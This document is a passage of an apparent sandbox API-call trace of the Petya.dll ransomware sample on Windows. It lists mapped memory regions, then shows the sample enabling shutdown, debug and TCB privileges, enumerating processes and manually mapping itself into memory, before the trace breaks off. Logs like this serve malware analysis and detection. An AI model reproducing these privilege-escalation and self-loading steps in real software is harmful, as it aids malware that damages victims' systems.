start_va = 0x1e0000 end_va = 0x21bfff entry_point = 0x1e128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 287 start_va = 0x1e0000 end_va = 0x21bfff entry_point = 0x1e128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 288 start_va = 0x74ae0000 end_va = 0x74b1afff entry_point = 0x74ae128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 310 start_va = 0x1e0000 end_va = 0x21ffff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 311 start_va = 0xe50000 end_va = 0xf4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e50000" filename = "" Region: id = 312 start_va = 0x7efd5000 end_va = 0x7efd7fff entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 313 start_va = 0xa80000 end_va = 0xabffff entry_point = 0x0 region_type = private name = "private_0x0000000000a80000" filename = "" Region: id = 314 start_va = 0xac0000 end_va = 0xafffff entry_point = 0x0 region_type = private name = "private_0x0000000000ac0000" filename = "" Region: id = 315 start_va = 0xf50000 end_va = 0x104ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f50000" filename = "" Region: id = 316 start_va = 0x1230000 end_va = 0x132ffff entry_point = 0x0 region_type = private name = "private_0x0000000001230000" filename = "" Region: id = 317 start_va = 0x7efad000 end_va = 0x7efaffff entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 318 start_va = 0x1060000 end_va = 0x109ffff entry_point = 0x0 region_type = private name = "private_0x0000000001060000" filename = "" Region: id = 319 start_va = 0x2800000 end_va = 0x28fffff entry_point = 0x0 region_type = private name = "private_0x0000000002800000" filename = "" Region: id = 320 start_va = 0x7efaa000 end_va = 0x7efacfff entry_point = 0x0 region_type = private name = "private_0x000000007efaa000" filename = "" Region: id = 321 start_va = 0x74ad0000 end_va = 0x74adafff entry_point = 0x74ad1200 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\SysWOW64\\cscapi.dll" (normalized: "c:\\windows\\syswow64\\cscapi.dll") Region: id = 337 start_va = 0x74ab0000 end_va = 0x74ac1fff entry_point = 0x74ab3271 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc.dll") Region: id = 442 start_va = 0x3f0000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 443 start_va = 0x1150000 end_va = 0x118ffff entry_point = 0x0 region_type = private name = "private_0x0000000001150000" filename = "" Region: id = 444 start_va = 0x2930000 end_va = 0x2a2ffff entry_point = 0x0 region_type = private name = "private_0x0000000002930000" filename = "" Region: id = 445 start_va = 0x2b60000 end_va = 0x2c5ffff entry_point = 0x0 region_type = private name = "private_0x0000000002b60000" filename = "" Region: id = 446 start_va = 0x74a60000 end_va = 0x74a9bfff entry_point = 0x74a6145d region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 447 start_va = 0x7efa4000 end_va = 0x7efa6fff entry_point = 0x0 region_type = private name = "private_0x000000007efa4000" filename = "" Region: id = 448 start_va = 0x7efa7000 end_va = 0x7efa9fff entry_point = 0x0 region_type = private name = "private_0x000000007efa7000" filename = "" Region: id = 469 start_va = 0x74a30000 end_va = 0x74a34fff entry_point = 0x74a315df region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\SysWOW64\\WSHTCPIP.DLL" (normalized: "c:\\windows\\syswow64\\wshtcpip.dll") Region: id = 473 start_va = 0x140000 end_va = 0x140fff entry_point = 0x140000 region_type = mapped_file name = "mpr.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\mpr.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\mpr.dll.mui") Region: id = 474 start_va = 0xa70000 end_va = 0xaaffff entry_point = 0x0 region_type = private name = "private_0x0000000000a70000" filename = "" Region: id = 475 start_va = 0x1050000 end_va = 0x114ffff entry_point = 0x0 region_type = private name = "private_0x0000000001050000" filename = "" Region: id = 476 start_va = 0x1190000 end_va = 0x11cffff entry_point = 0x0 region_type = private name = "private_0x0000000001190000" filename = "" Region: id = 477 start_va = 0x11e0000 end_va = 0x121ffff entry_point = 0x0 region_type = private name = "private_0x00000000011e0000" filename = "" Region: id = 478 start_va = 0x1220000 end_va = 0x131ffff entry_point = 0x0 region_type = private name = "private_0x0000000001220000" filename = "" Region: id = 479 start_va = 0x2830000 end_va = 0x292ffff entry_point = 0x0 region_type = private name = "private_0x0000000002830000" filename = "" Region: id = 480 start_va = 0x2d50000 end_va = 0x2e4ffff entry_point = 0x0 region_type = private name = "private_0x0000000002d50000" filename = "" Region: id = 481 start_va = 0x7efa1000 end_va = 0x7efa3fff entry_point = 0x0 region_type = private name = "private_0x000000007efa1000" filename = "" Region: id = 482 start_va = 0x7efaa000 end_va = 0x7efacfff entry_point = 0x0 region_type = private name = "private_0x000000007efaa000" filename = "" Region: id = 483 start_va = 0x74970000 end_va = 0x74977fff entry_point = 0x74971356 region_type = mapped_file name = "drprov.dll" filename = "\\Windows\\SysWOW64\\drprov.dll" (normalized: "c:\\windows\\syswow64\\drprov.dll") Region: id = 484 start_va = 0x74940000 end_va = 0x74968fff entry_point = 0x74946b19 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 485 start_va = 0x27d0000 end_va = 0x280ffff entry_point = 0x0 region_type = private name = "private_0x00000000027d0000" filename = "" Region: id = 486 start_va = 0x2ed0000 end_va = 0x2fcffff entry_point = 0x0 region_type = private name = "private_0x0000000002ed0000" filename = "" Region: id = 487 start_va = 0x74920000 end_va = 0x74933fff entry_point = 0x749215c9 region_type = mapped_file name = "ntlanman.dll" filename = "\\Windows\\SysWOW64\\ntlanman.dll" (normalized: "c:\\windows\\syswow64\\ntlanman.dll") Region: id = 488 start_va = 0x7ef9e000 end_va = 0x7efa0fff entry_point = 0x0 region_type = private name = "private_0x000000007ef9e000" filename = "" Region: id = 489 start_va = 0x74a40000 end_va = 0x74a56fff entry_point = 0x74a41549 region_type = mapped_file name = "davclnt.dll" filename = "\\Windows\\SysWOW64\\davclnt.dll" (normalized: "c:\\windows\\syswow64\\davclnt.dll") Region: id = 490 start_va = 0x74aa0000 end_va = 0x74aa7fff entry_point = 0x74aa3c87 region_type = mapped_file name = "davhlpr.dll" filename = "\\Windows\\SysWOW64\\davhlpr.dll" (normalized: "c:\\windows\\syswow64\\davhlpr.dll") Region: id = 888 start_va = 0x9e0000 end_va = 0xa1ffff entry_point = 0x0 region_type = private name = "private_0x00000000009e0000" filename = "" Region: id = 889 start_va = 0x3080000 end_va = 0x317ffff entry_point = 0x0 region_type = private name = "private_0x0000000003080000" filename = "" Region: id = 890 start_va = 0x7ef9b000 end_va = 0x7ef9dfff entry_point = 0x0 region_type = private name = "private_0x000000007ef9b000" filename = "" Thread: id = 1 os_tid = 0x94c [0034.026] DisableThreadLibraryCalls (hLibModule=0x74c70000) returned 1 [0034.027] GetTickCount () returned 0x10109 [0034.027] GetCurrentProcess () returned 0xffffffff [0034.028] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x3caca0 | out: TokenHandle=0x3caca0*=0xd8) returned 1 [0034.028] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeShutdownPrivilege", lpLuid=0x3cac90 | out: lpLuid=0x3cac90*(LowPart=0x13, HighPart=0)) returned 1 [0034.036] AdjustTokenPrivileges (in: TokenHandle=0xd8, DisableAllPrivileges=0, NewState=0x3cac8c*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0034.036] GetLastError () returned 0x0 [0034.036] SetLastError (dwErrCode=0x0) [0034.036] GetCurrentProcess () returned 0xffffffff [0034.036] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x3caca0 | out: TokenHandle=0x3caca0*=0x11c) returned 1 [0034.036] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x3cac90 | out: lpLuid=0x3cac90*(LowPart=0x14, HighPart=0)) returned 1 [0034.037] AdjustTokenPrivileges (in: TokenHandle=0x11c, DisableAllPrivileges=0, NewState=0x3cac8c*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0034.037] GetLastError () returned 0x0 [0034.037] SetLastError (dwErrCode=0x0) [0034.037] GetCurrentProcess () returned 0xffffffff [0034.037] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x3caca0 | out: TokenHandle=0x3caca0*=0x120) returned 1 [0034.037] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeTcbPrivilege", lpLuid=0x3cac90 | out: lpLuid=0x3cac90*(LowPart=0x7, HighPart=0)) returned 1 [0034.038] AdjustTokenPrivileges (in: TokenHandle=0x120, DisableAllPrivileges=0, NewState=0x3cac8c*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x7, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0034.038] GetLastError () returned 0x514 [0034.038] SetLastError (dwErrCode=0x514) [0034.038] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x124 [0034.041] Process32FirstW (in: hSnapshot=0x124, lppe=0x3caa70 | out: lppe=0x3caa70*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0034.042] Process32NextW (in: hSnapshot=0x124, lppe=0x3caa70 | out: lppe=0x3caa70*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0034.042] Process32NextW (in: hSnapshot=0x124, lppe=0x3caa70 | out: lppe=0x3caa70*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0034.043] Process32NextW (in: hSnapshot=0x124, lppe=0x3caa70 | out: lppe=0x3caa70*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x138, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0034.044] Process32NextW (in: hSnapshot=0x124, lppe=0x3caa70 | out: lppe=0x3caa70*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x138, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0034.044] Process32NextW (in: hSnapshot=0x124, lppe=0x3caa70 | out: lppe=0x3caa70*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x160, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0034.045] Process32NextW (in: hSnapshot=0x124, lppe=0x3caa70 | out: lppe=0x3caa70*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x160, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0034.046] Process32NextW (in: hSnapshot=0x124, lppe=0x3caa70 | out: lppe=0x3caa70*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x168, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0034.046] Process32NextW (in: hSnapshot=0x124, lppe=0x3caa70 | out: lppe=0x3caa70*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x168, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0034.048] Process32NextW (in: hSnapshot=0x124, lppe=0x3caa70 | out: lppe=0x3caa70*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x168, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0034.049] Process32NextW (in: hSnapshot=0x124, lppe=0x3caa70 | out: lppe=0x3caa70*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1b8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0034.049] Process32NextW (in: hSnapshot=0x124, lppe=0x3caa70 | out: lppe=0x3caa70*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x284, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1b8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0034.050] Process32NextW (in: hSnapshot=0x124, lppe=0x3caa70 | out: lppe=0x3caa70*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1b8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0034.050] Process32NextW (in: hSnapshot=0x124, lppe=0x3caa70 | out: lppe=0x3caa70*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0034.051] Process32NextW (in: hSnapshot=0x124, lppe=0x3caa70 | out: lppe=0x3caa70*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x35c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x1b8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0034.052] Process32NextW (in: hSnapshot=0x124, lppe=0x3caa70 | out: lppe=0x3caa70*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x398, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0034.053] Process32NextW (in: hSnapshot=0x124, lppe=0x3caa70 | out: lppe=0x3caa70*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1b8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0034.054] Process32NextW (in: hSnapshot=0x124, lppe=0x3caa70 | out: lppe=0x3caa70*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x2a0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0034.055] Process32NextW (in: hSnapshot=0x124, lppe=0x3caa70 | out: lppe=0x3caa70*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x414, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x328, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0034.056] Process32NextW (in: hSnapshot=0x124, lppe=0x3caa70 | out: lppe=0x3caa70*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x44c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1b8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0034.057] Process32NextW (in: hSnapshot=0x124, lppe=0x3caa70 | out: lppe=0x3caa70*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1b8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0034.058] Process32NextW (in: hSnapshot=0x124, lppe=0x3caa70 | out: lppe=0x3caa70*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0034.059] Process32NextW (in: hSnapshot=0x124, lppe=0x3caa70 | out: lppe=0x3caa70*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1b8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0034.060] Process32NextW (in: hSnapshot=0x124, lppe=0x3caa70 | out: lppe=0x3caa70*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x564, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x35c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0034.061] Process32NextW (in: hSnapshot=0x124, lppe=0x3caa70 | out: lppe=0x3caa70*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x76c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1b8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0034.062] Process32NextW (in: hSnapshot=0x124, lppe=0x3caa70 | out: lppe=0x3caa70*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x484, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x108, pcPriClassBase=8, dwFlags=0x0, szExeFile="lucksnake.exe")) returned 1 [0034.063] Process32NextW (in: hSnapshot=0x124, lppe=0x3caa70 | out: lppe=0x3caa70*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x108, pcPriClassBase=8, dwFlags=0x0, szExeFile="congressional.exe")) returned 1 [0034.064] Process32NextW (in: hSnapshot=0x124, lppe=0x3caa70 | out: lppe=0x3caa70*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x108, pcPriClassBase=8, dwFlags=0x0, szExeFile="discountdialmeltruth.exe")) returned 1 [0034.065] Process32NextW (in: hSnapshot=0x124, lppe=0x3caa70 | out: lppe=0x3caa70*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x108, pcPriClassBase=8, dwFlags=0x0, szExeFile="how satisfaction wine.exe")) returned 1 [0034.066] Process32NextW (in: hSnapshot=0x124, lppe=0x3caa70 | out: lppe=0x3caa70*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x31c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x108, pcPriClassBase=8, dwFlags=0x0, szExeFile="rouge.exe")) returned 1 [0034.067] Process32NextW (in: hSnapshot=0x124, lppe=0x3caa70 | out: lppe=0x3caa70*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x108, pcPriClassBase=8, dwFlags=0x0, szExeFile="function_panel_cams.exe")) returned 1 [0034.068] Process32NextW (in: hSnapshot=0x124, lppe=0x3caa70 | out: lppe=0x3caa70*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x108, pcPriClassBase=8, dwFlags=0x0, szExeFile="gotta_microwave_heights.exe")) returned 1 [0034.069] Process32NextW (in: hSnapshot=0x124, lppe=0x3caa70 | out: lppe=0x3caa70*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x698, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x108, pcPriClassBase=8, dwFlags=0x0, szExeFile="vertical.exe")) returned 1 [0034.070] Process32NextW (in: hSnapshot=0x124, lppe=0x3caa70 | out: lppe=0x3caa70*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x108, pcPriClassBase=8, dwFlags=0x0, szExeFile="partnersrecreationalagelucia.exe")) returned 1 [0034.071] Process32NextW (in: hSnapshot=0x124, lppe=0x3caa70 | out: lppe=0x3caa70*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x668, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x108, pcPriClassBase=8, dwFlags=0x0, szExeFile="modified-rf-handle-flat.exe")) returned 1 [0034.072] Process32NextW (in: hSnapshot=0x124, lppe=0x3caa70 | out: lppe=0x3caa70*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x108, pcPriClassBase=8, dwFlags=0x0, szExeFile="emailcldeclared.exe")) returned 1 [0034.073] Process32NextW (in: hSnapshot=0x124, lppe=0x3caa70 | out: lppe=0x3caa70*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x764, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x108, pcPriClassBase=8, dwFlags=0x0, szExeFile="trainer.exe")) returned 1 [0034.074] Process32NextW (in: hSnapshot=0x124, lppe=0x3caa70 | out: lppe=0x3caa70*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x108, pcPriClassBase=8, dwFlags=0x0, szExeFile="venezuela_tracked_powers_overcome.exe")) returned 1 [0034.075] Process32NextW (in: hSnapshot=0x124, lppe=0x3caa70 | out: lppe=0x3caa70*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x108, pcPriClassBase=8, dwFlags=0x0, szExeFile="chargersgoalspoint.exe")) returned 1 [0034.076] Process32NextW (in: hSnapshot=0x124, lppe=0x3caa70 | out: lppe=0x3caa70*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x108, pcPriClassBase=8, dwFlags=0x0, szExeFile="surge.exe")) returned 1 [0034.077] Process32NextW (in: hSnapshot=0x124, lppe=0x3caa70 | out: lppe=0x3caa70*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x108, pcPriClassBase=8, dwFlags=0x0, szExeFile="authorization.exe")) returned 1 [0034.078] Process32NextW (in: hSnapshot=0x124, lppe=0x3caa70 | out: lppe=0x3caa70*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x108, pcPriClassBase=8, dwFlags=0x0, szExeFile="significance_associate_endif_package.exe")) returned 1 [0034.079] Process32NextW (in: hSnapshot=0x124, lppe=0x3caa70 | out: lppe=0x3caa70*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x108, pcPriClassBase=8, dwFlags=0x0, szExeFile="championships testing cave.exe")) returned 1 [0034.080] Process32NextW (in: hSnapshot=0x124, lppe=0x3caa70 | out: lppe=0x3caa70*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x108, pcPriClassBase=8, dwFlags=0x0, szExeFile="fear.exe")) returned 1 [0034.081] Process32NextW (in: hSnapshot=0x124, lppe=0x3caa70 | out: lppe=0x3caa70*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x81c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x240, pcPriClassBase=8, dwFlags=0x0, szExeFile="mobsync.exe")) returned 1 [0034.082] Process32NextW (in: hSnapshot=0x124, lppe=0x3caa70 | out: lppe=0x3caa70*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x240, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0034.083] Process32NextW (in: hSnapshot=0x124, lppe=0x3caa70 | out: lppe=0x3caa70*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x928, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x240, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0034.084] Process32NextW (in: hSnapshot=0x124, lppe=0x3caa70 | out: lppe=0x3caa70*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x948, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x108, pcPriClassBase=8, dwFlags=0x0, szExeFile="AGakmVMR.exe")) returned 1 [0034.085] Process32NextW (in: hSnapshot=0x124, lppe=0x3caa70 | out: lppe=0x3caa70*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x948, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x108, pcPriClassBase=8, dwFlags=0x0, szExeFile="AGakmVMR.exe")) returned 0 [0034.086] CloseHandle (hObject=0x124) returned 1 [0034.086] GetModuleFileNameW (in: hModule=0x74c70000, lpFilename=0x74c8f148, nSize=0x30c | out: lpFilename="C:\\Users\\HJRD1K~1\\Desktop\\Petya.dll") returned 0x23 [0034.086] CreateFileW (lpFileName="C:\\Users\\HJRD1K~1\\Desktop\\Petya.dll" (normalized: "c:\\users\\hjrd1k~1\\desktop\\petya.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0034.086] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x58778 [0034.088] ReadFile (in: hFile=0x124, lpBuffer=0x493ce0, nNumberOfBytesToRead=0x58778, lpNumberOfBytesRead=0x3cacac, lpOverlapped=0x0 | out: lpBuffer=0x493ce0*, lpNumberOfBytesRead=0x3cacac*=0x58778, lpOverlapped=0x0) returned 1 [0034.094] CloseHandle (hObject=0x124) returned 1 [0034.094] VirtualAlloc (lpAddress=0x0, dwSize=0x5e000, flAllocationType=0x1000, flProtect=0x4) returned 0xe0000 [0034.114] VirtualProtect (in: lpAddress=0xe0000, dwSize=0x400, flNewProtect=0x2, lpflOldProtect=0x3cac78 | out: lpflOldProtect=0x3cac78*=0x4) returned 1 [0034.114] VirtualProtect (in: lpAddress=0xe1000, dwSize=0xbd63, flNewProtect=0x20, lpflOldProtect=0x3cac78 | out: lpflOldProtect=0x3cac78*=0x4) returned 1 [0034.114] VirtualProtect (in: lpAddress=0xed000, dwSize=0x8546, flNewProtect=0x2, lpflOldProtect=0x3cac78 | out: lpflOldProtect=0x3cac78*=0x4) returned 1 [0034.115] VirtualProtect (in: lpAddress=0xf6000, dwSize=0x9b4a, flNewProtect=0x4, lpflOldProtect=0x3cac78 | out: lpflOldProtect=0x3cac78*=0x4) returned 1 [0034.115] VirtualProtect (in: lpAddress=0x100000, dwSize=0x3c738, flNewProtect=0x2, lpflOldProtect=0x3cac78 | out: lpflOldProtect=0x3cac78*=0x4) returned 1 [0034.116] VirtualProtect (in: lpAddress=0x13d000, dwSize=0xc02, flNewProtect=0x2, lpflOldProtect=0x3cac78 | out: 